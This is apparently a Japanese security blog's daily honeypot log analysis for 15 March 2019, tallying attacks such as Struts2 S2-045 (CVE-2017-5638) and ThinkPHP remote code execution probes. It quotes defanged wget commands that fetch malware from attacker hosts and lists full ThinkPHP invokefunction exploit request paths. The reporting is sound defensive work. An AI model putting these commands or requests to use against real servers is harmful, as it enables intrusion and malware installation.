S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2019/03/15)

WOWhoneypotの2019/03/15(金) (運用282日目)の簡易分析です。
本日の総アクセス件数は80件です。送信元IP数は32IPです。
本日の主なアクセスは以下です。

Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:33 件
・ ThinkPHPの脆弱性を突いた攻撃:8 件

本日のドメイン名でのアクセスは以下です。

3 GET /
1 GET /robots.txt

本日のハンティングログは以下です。Struts2の攻撃の通信先です。

5 2019-03-15 wget -c hxxp://154.85.99.85:8080/Linux2.6
4 2019-03-15 wget -c hxxp://wap.tfddos.net:57843/linux
1 2019-03-15 wget hxxp://103.243.27.233:3721/Linux-syn045

以下が全アクセスログです。

件数 日付 種別 リクエス
33 2019/3/15 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
31 2019/3/15 アクセス GET /
2 2019/3/15 XDebugの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 2019/3/15 クローリング HEAD /robots.txt
1 2019/3/15 スキャナによる調査 HEAD /redirect.php
1 2019/3/15 PHPUnitの調査 GET /vendor/phpunit/phpunit/README.md
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 クローリング GET /robots.txt
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 ThinkPHPの脆弱性を突いた攻撃 GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2019/3/15 D-Linkルータの脆弱性(CVE-2015-2051)の調査 GET /HNAP1/
1 2019/3/15 管理者設定の調査 GET /admin/config.php

以上です。